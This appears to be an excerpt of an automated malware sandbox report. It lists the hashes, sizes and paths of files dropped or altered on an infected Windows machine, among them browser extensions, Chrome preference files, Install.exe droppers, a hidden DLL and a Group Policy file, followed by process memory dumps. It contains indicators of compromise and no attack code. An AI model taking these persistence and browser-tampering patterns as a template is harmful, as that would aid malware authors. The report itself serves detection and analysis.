                                                                                                          4b8ac89797e8bacb8bb60d1f188aab23

                                                                                                          SHA1

                                                                                                          9b6f0a469ee2fb395558fd1e01e9c85febf5d06c

                                                                                                          SHA256

                                                                                                          0afe62e69a9f6e867b2134e3e2ea8fe5214fae1bb214a449c71293affb452bab

                                                                                                          SHA512

                                                                                                          7af8ad8f91df087bd67eb9ace39c2b50f1c7e5065db48decb714a9df36356708ae91804715151af63debc7a75b2339ac2a100946766ca8144f5073cd4f76d66a

                                                                                                        • C:\Program Files (x86)\XTIErcVviYlSEsscsXR\pnzWIiw.xml

                                                                                                          Filesize

                                                                                                          2KB

                                                                                                          MD5

                                                                                                          eae627c567e0eba8fc4ed8c2090bfe0b

                                                                                                          SHA1

                                                                                                          a0171038f32bbf4ba322c1fefcb5384843025b70

                                                                                                          SHA256

                                                                                                          3ca36f39bb9726db3bb803f44fbdd5ff13ef151402136989e3dde0d115584b35

                                                                                                          SHA512

                                                                                                          9ae3ac5baf18995de4c68b74b125f25384b5d3f2ff497ddc705f51dc82ef824e9cb5ac7d35556e8107f52af969373640b20b4793729c8b03a13b80ffc58e0837

                                                                                                        • C:\Program Files (x86)\enDWjyqEZhNU2\PwbYhRs.xml

                                                                                                          Filesize

                                                                                                          2KB

                                                                                                          MD5

                                                                                                          d3c3942a07d2fa88f6530cd687ee2189

                                                                                                          SHA1

                                                                                                          32282837e227d4cfaaffc3ce1f2bd91aa6c67c6b

                                                                                                          SHA256

                                                                                                          d7af126bb770e99242ea6f4bb825b9ffebff6e2b7bc9ab533e542c8075793f3d

                                                                                                          SHA512

                                                                                                          5c92fb7f7e1d900ff88a9925252fba4543b1241d313ecdab0a2d5a3365eb2cdeb911f04cc3fe61c67a3f49f81eebae1eadc75cc105a6e4f1163defade91ea9c3

                                                                                                        • C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

                                                                                                          Filesize

                                                                                                          2.0MB

                                                                                                          MD5

                                                                                                          660ca2ad9b7f182372fb535f49c80a5b

                                                                                                          SHA1

                                                                                                          2c213d9e1e99b905601c45b573ff246accf0d529

                                                                                                          SHA256

                                                                                                          2dcc98de0ab207bc08b800ee15b60fda432e1b338e22e7a48f5c3415984c475f

                                                                                                          SHA512

                                                                                                          8d2297216d36935f5151cf1f035504752d3e4e753a974cf714f5ce82c0eb1c3cb247c6701e91cc27319666cf417d4cd71cbaaae7253de8ff5ae326f14def5bb6

                                                                                                        • C:\ProgramData\qDoHUGiKOnuwyvVB\ptXituU.xml

                                                                                                          Filesize

                                                                                                          2KB

                                                                                                          MD5

                                                                                                          ee673dc34bdf54196016f240a1cbd74e

                                                                                                          SHA1

                                                                                                          8375d0a174b770bfbb3d79cd2a404a0fb6ed6fa5

                                                                                                          SHA256

                                                                                                          6627ca83d397f49a146d5b7b50aea35d799f76911149b0940b51f0ebb2badbe8

                                                                                                          SHA512

                                                                                                          bf0ddb667d6669cb296b561c7f8df967bc5c7d7dda49c52da920ca19d970f34ea4e33062c9345e11cdcc3cac0ab657eb45314ed98c24884fd8f78df5bac5141d

                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

                                                                                                          Filesize

                                                                                                          187B

                                                                                                          MD5

                                                                                                          2a1e12a4811892d95962998e184399d8

                                                                                                          SHA1

                                                                                                          55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                          SHA256

                                                                                                          32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                          SHA512

                                                                                                          bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

                                                                                                          Filesize

                                                                                                          136B

                                                                                                          MD5

                                                                                                          238d2612f510ea51d0d3eaa09e7136b1

                                                                                                          SHA1

                                                                                                          0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                          SHA256

                                                                                                          801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                          SHA512

                                                                                                          2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

                                                                                                          Filesize

                                                                                                          150B

                                                                                                          MD5

                                                                                                          0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                          SHA1

                                                                                                          6a51537cef82143d3d768759b21598542d683904

                                                                                                          SHA256

                                                                                                          0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                          SHA512

                                                                                                          5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                          Filesize

                                                                                                          10KB

                                                                                                          MD5

                                                                                                          0edd6f46326a47d468e5749a8251ded0

                                                                                                          SHA1

                                                                                                          17984ee5b4fbfefb55fc3ab58eba20afb0bbc934

                                                                                                          SHA256

                                                                                                          2f40062d75cece99df5d8c1e3ed7de19282f6299c6a830e8265981f738716b9a

                                                                                                          SHA512

                                                                                                          f50348cb51f28949396dd11c6ed5f693b8d97b2030e9643361b4bb2f0c46b6d10240027df5962d37ef599ab3623a47fb1541fd7ed9ceb9cf7b0864f62e85b7a7

                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                          Filesize

                                                                                                          30KB

                                                                                                          MD5

                                                                                                          00b80de98e654b78fe4d0bf0d4b62c7b

                                                                                                          SHA1

                                                                                                          1db993a2248cb1c5ba350096ac2d9ee14888c3f6

                                                                                                          SHA256

                                                                                                          be54dcf5fed1236a044e63f68c930560ef6fbf42c991e6ef5ec9c617d3c34a2b

                                                                                                          SHA512

                                                                                                          4e56daf21df65b9fc47d51a9408e29dbab890665d55e9adaa48c64b01ad02cc10c627d41e4688768530d9d513721935cc3ee4456819c322e6931873f8300c9cd

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                          Filesize

                                                                                                          2KB

                                                                                                          MD5

                                                                                                          6bf0e5945fb9da68e1b03bdaed5f6f8d

                                                                                                          SHA1

                                                                                                          eed3802c8e4abe3b327c100c99c53d3bbcf8a33d

                                                                                                          SHA256

                                                                                                          dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1

                                                                                                          SHA512

                                                                                                          977a393fdad2b162aa42194ddad6ec8bcab24f81980ff01b1c22c4d59ac268bb5ce947105c968de1a8a66b35023280a1e7709dfea5053385f87141389ebecb25

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Filesize

                                                                                                          12KB

                                                                                                          MD5

                                                                                                          acb8c1f251887b017a3e319dfcfad6ce

                                                                                                          SHA1

                                                                                                          93e4f65af5f271d979be7d0ff0dd60d8a421eba0

                                                                                                          SHA256

                                                                                                          8c1bc05dafa8e41facf1899a37dd98ef3a265d0cd6213c9e99cccb497c667ef7

                                                                                                          SHA512

                                                                                                          376e3da3428ea66ced2de12967335a92a47232e5a6dd5e916b4d6adccfe6187c6029ba3d97b3c74b7b67f9f92938cfd3d6579f764b23b8888d50832aedf0a2e8

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Filesize

                                                                                                          15KB

                                                                                                          MD5

                                                                                                          e4a9411541b050bf40dcd9ad2c824d74

                                                                                                          SHA1

                                                                                                          ad48c3463d116f0391028ea1d57ae708cf7a666f

                                                                                                          SHA256

                                                                                                          9dd0de4457fe97884d4c6d58ff4e89f47dc42c9f1dd2ec897d49626cf5e7457e

                                                                                                          SHA512

                                                                                                          749bb035a29980ff0d853fd73b29702f6d01fe7bcf10576a0dbf8504d79e176b4336ce29804d018cb6cf85a8824e754150454631688d3e7f39e7923d1a09af2c

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS6987.tmp\Install.exe

                                                                                                          Filesize

                                                                                                          6.4MB

                                                                                                          MD5

                                                                                                          7dc92fb0b434bf188a0dca6c53a0a1a7

                                                                                                          SHA1

                                                                                                          dcdf08775b67d921d8177ac73cefc0435e7c955a

                                                                                                          SHA256

                                                                                                          a5e40c8b2d7ed773517aff0d08592d22659acd8e557a3c45418e384ada72e8a5

                                                                                                          SHA512

                                                                                                          370afc9152dfe41eddd7b3974684815c9d983d7d508a855a72558078dabecd13a4a9e3edb625c7221c51ea8e689bce0997ddf50b41517552df3959f7c1b7f1a7

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install.exe

                                                                                                          Filesize

                                                                                                          6.7MB

                                                                                                          MD5

                                                                                                          edd50592ab69b499f7fd1fad1659baa1

                                                                                                          SHA1

                                                                                                          882b2eb1a12a1bd2a516d0f3f8500036abd3b25c

                                                                                                          SHA256

                                                                                                          92f5569ad1c4d84cc12cb7068c4a2929f1ad0ee8bf7110a672a4d7932ccb67c2

                                                                                                          SHA512

                                                                                                          f1a5401e0ed875e96ec6719abab973061953f6058360def9fa38d6fa07f68abdb7c96c88858d1b8200553a1e930d933fd27bc8c00d8ec6cba18b9bbecf08038e

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3ofgno0a.fvt.ps1

                                                                                                          Filesize

                                                                                                          1B

                                                                                                          MD5

                                                                                                          c4ca4238a0b923820dcc509a6f75849b

                                                                                                          SHA1

                                                                                                          356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                          SHA256

                                                                                                          6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                          SHA512

                                                                                                          4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\prefs.js

                                                                                                          Filesize

                                                                                                          6KB

                                                                                                          MD5

                                                                                                          257c2ff7a733d5dab3cf78cba7304f8f

                                                                                                          SHA1

                                                                                                          6f958a32e9183c174b5b6171829c99c1ab3abe04

                                                                                                          SHA256

                                                                                                          63d0ff8029c9b92ab7c66f0ec317349b0fbbf6e9c8cdfb4d09d56a916ea1492a

                                                                                                          SHA512

                                                                                                          dfb5e4218bbcc3cec5f0f12bc1acd09a94691c9cb6897fc1558ec86fb3ab5abfe058b8cdccc0a4cb33fefecc964e1ce49f0352c6f99ff476da9b6a0b4b72ba3b

                                                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Filesize

                                                                                                          15KB

                                                                                                          MD5

                                                                                                          92bcc9f6f2c00fc126de0b597a563d70

                                                                                                          SHA1

                                                                                                          ccdb746d2d12b3c8410ad9a555598f6fcca144c0

                                                                                                          SHA256

                                                                                                          4583c87b8b8cff131fa0ec9ad0ad3b6601b356238a2d868237ed821c20b99cbf

                                                                                                          SHA512

                                                                                                          3102b22e2bf0763aafe5f873959aed1bb85b72d34fcec86542ee40124459eb777797e8a9a45ba7111f18f513b5f619f2128786ea202e32335e03155dd19608b8

                                                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Filesize

                                                                                                          12KB

                                                                                                          MD5

                                                                                                          aa240d9f40db8c5b4341867189986e04

                                                                                                          SHA1

                                                                                                          864140689c54fabaa7907e93819716e1bb41c3c0

                                                                                                          SHA256

                                                                                                          0222b28a3fe0147a9c2c717688215a657a75ad5b17748cf5b5958c63b389e38f

                                                                                                          SHA512

                                                                                                          bb0a398ad4857e94b8ebc95aac6cf24e8b077278eee2cf2c56d05ef3cf8dfe384a184ec2e7c620546b87e517e45dccf81c67d3167b187a990a38ef728f7889d2

                                                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Filesize

                                                                                                          12KB

                                                                                                          MD5

                                                                                                          7da0d7daa214c8e94e6c94b3525b59bd

                                                                                                          SHA1

                                                                                                          c34c94f6ff9e8177c8effa000c16133f36e35a2a

                                                                                                          SHA256

                                                                                                          14daa0de18faedd82815123235e40f31d068bea90ae7226a0209ef7e71f49f4c

                                                                                                          SHA512

                                                                                                          070370af65e21369e5d9203cfb9503580741d0ee43d8bb9fc16bad3b2727db268e5ae6f179ddc4595915f62bc53b8590ca567b14072ac34544125fcf803de192

                                                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Filesize

                                                                                                          15KB

                                                                                                          MD5

                                                                                                          2af817ffa7aee263294f75e0d67a4b65

                                                                                                          SHA1

                                                                                                          41dd9b43700ea17ff52ff32633e1f68e47802468

                                                                                                          SHA256

                                                                                                          4932563ce35f2aeff5a00d394eb68fc60a2a8e4f017ea6b0f7e19c2721450d27

                                                                                                          SHA512

                                                                                                          e01f6e41e896b2dbb5989f10a8f9e55abfc5bc5fa3c1af64ecc82f821ef592966415a76b4e5b64bf980ea09bcf764b39332c2b3c0ecaad6d3339ad508618255c

                                                                                                        • C:\Windows\Temp\VemQCkOhwRjHyFqD\dUCxVsvc\CslOOOS.dll

                                                                                                          Filesize

                                                                                                          6.4MB

                                                                                                          MD5

                                                                                                          036ff06d77a51bfb4d5b0368c1c96760

                                                                                                          SHA1

                                                                                                          82f349bf706dc4be88b9ff67e67017cc03a11581

                                                                                                          SHA256

                                                                                                          1c124bea82a19344a28de791cdc5ce0ecbe8553c947c91e6c75e9aa52cc1eb7c

                                                                                                          SHA512

                                                                                                          5c21aecf14e3384b256a13388e45dbce359dd9cdab6bf564befb3f08fd217ffb78b85235997528763742acef96bdf727f8a207877cc95a531dd73e91495c8efb

                                                                                                        • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                          Filesize

                                                                                                          6KB

                                                                                                          MD5

                                                                                                          d34dd5ac4d5069bbcb9fbfb23c2ea07b

                                                                                                          SHA1

                                                                                                          6ce50f82885f82271a403e9077d48b5a23b17921

                                                                                                          SHA256

                                                                                                          066c916436530d917f7e62828567e2d00fcdf53e5a1203ae3003bbe62a169969

                                                                                                          SHA512

                                                                                                          fda0b8675275bfbd3e6184eaf6df00c663181b32eab0472180bb935b8f72277e0a3665a5f2260f77d11fc16b3b006d081ab97ad027f9614834b10d9ebd9495bb

                                                                                                        • memory/512-141-0x0000025EF0E70000-0x0000025EF0E92000-memory.dmp

                                                                                                          Filesize

                                                                                                          136KB

                                                                                                        • memory/512-145-0x0000025EF1190000-0x0000025EF1206000-memory.dmp

                                                                                                          Filesize

                                                                                                          472KB

                                                                                                        • memory/828-56-0x0000000007960000-0x0000000007CB0000-memory.dmp

                                                                                                          Filesize

                                                                                                          3.3MB

                                                                                                        • memory/828-58-0x0000000007FF0000-0x000000000803B000-memory.dmp

                                                                                                          Filesize

                                                                                                          300KB

                                                                                                        • memory/2296-225-0x0000000006DB0000-0x0000000006DFB000-memory.dmp

                                                                                                          Filesize

                                                                                                          300KB

                                                                                                        • memory/2296-213-0x00000000068F0000-0x0000000006C40000-memory.dmp

                                                                                                          Filesize

                                                                                                          3.3MB

                                                                                                        • memory/3280-270-0x0000000002D40000-0x0000000002DA5000-memory.dmp

                                                                                                          Filesize

                                                                                                          404KB

                                                                                                        • memory/3280-487-0x0000000000320000-0x00000000009D4000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.7MB

                                                                                                        • memory/3280-458-0x0000000003980000-0x0000000003A06000-memory.dmp

                                                                                                          Filesize

                                                                                                          536KB

                                                                                                        • memory/3280-468-0x0000000003AF0000-0x0000000003BC7000-memory.dmp

                                                                                                          Filesize

                                                                                                          860KB

                                                                                                        • memory/3280-199-0x0000000010000000-0x00000000105DD000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.9MB

                                                                                                        • memory/3280-214-0x00000000026C0000-0x0000000002745000-memory.dmp

                                                                                                          Filesize

                                                                                                          532KB

                                                                                                        • memory/3280-174-0x0000000000320000-0x00000000009D4000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.7MB

                                                                                                        • memory/4012-74-0x0000000001350000-0x0000000001A04000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.7MB

                                                                                                        • memory/4012-101-0x0000000010000000-0x00000000105DD000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.9MB

                                                                                                        • memory/4012-175-0x0000000001350000-0x0000000001A04000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.7MB

                                                                                                        • memory/4120-49-0x0000000010000000-0x00000000105DD000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.9MB

                                                                                                        • memory/4120-12-0x0000000001350000-0x0000000001A04000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.7MB

                                                                                                        • memory/4120-73-0x0000000001350000-0x0000000001A04000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.7MB

                                                                                                        • memory/4220-454-0x0000000003F20000-0x00000000044FD000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.9MB

                                                                                                        • memory/4308-78-0x0000000007790000-0x00000000077DB000-memory.dmp

                                                                                                          Filesize

                                                                                                          300KB

                                                                                                        • memory/4308-77-0x0000000006D40000-0x0000000007090000-memory.dmp

                                                                                                          Filesize

                                                                                                          3.3MB

                                                                                                        • memory/4568-17-0x0000000007E40000-0x0000000007E62000-memory.dmp

                                                                                                          Filesize

                                                                                                          136KB

                                                                                                        • memory/4568-21-0x0000000007FB0000-0x0000000007FCC000-memory.dmp

                                                                                                          Filesize

                                                                                                          112KB

                                                                                                        • memory/4568-20-0x00000000081F0000-0x0000000008540000-memory.dmp

                                                                                                          Filesize

                                                                                                          3.3MB

                                                                                                        • memory/4568-19-0x0000000008130000-0x0000000008196000-memory.dmp

                                                                                                          Filesize

                                                                                                          408KB

                                                                                                        • memory/4568-18-0x0000000007EE0000-0x0000000007F46000-memory.dmp

                                                                                                          Filesize

                                                                                                          408KB

                                                                                                        • memory/4568-23-0x0000000008890000-0x0000000008906000-memory.dmp

                                                                                                          Filesize

                                                                                                          472KB

                                                                                                        • memory/4568-38-0x0000000009A00000-0x0000000009A94000-memory.dmp

                                                                                                          Filesize

                                                                                                          592KB

                                                                                                        • memory/4568-16-0x0000000007810000-0x0000000007E38000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.2MB

                                                                                                        • memory/4568-39-0x00000000096A0000-0x00000000096BA000-memory.dmp

                                                                                                          Filesize

                                                                                                          104KB

                                                                                                        • memory/4568-40-0x0000000009710000-0x0000000009732000-memory.dmp

                                                                                                          Filesize

                                                                                                          136KB

                                                                                                        • memory/4568-15-0x0000000007100000-0x0000000007136000-memory.dmp

                                                                                                          Filesize

                                                                                                          216KB

                                                                                                        • memory/4568-41-0x0000000009FA0000-0x000000000A49E000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.0MB

                                                                                                        • memory/4568-22-0x0000000008B40000-0x0000000008B8B000-memory.dmp

                                                                                                          Filesize

                                                                                                          300KB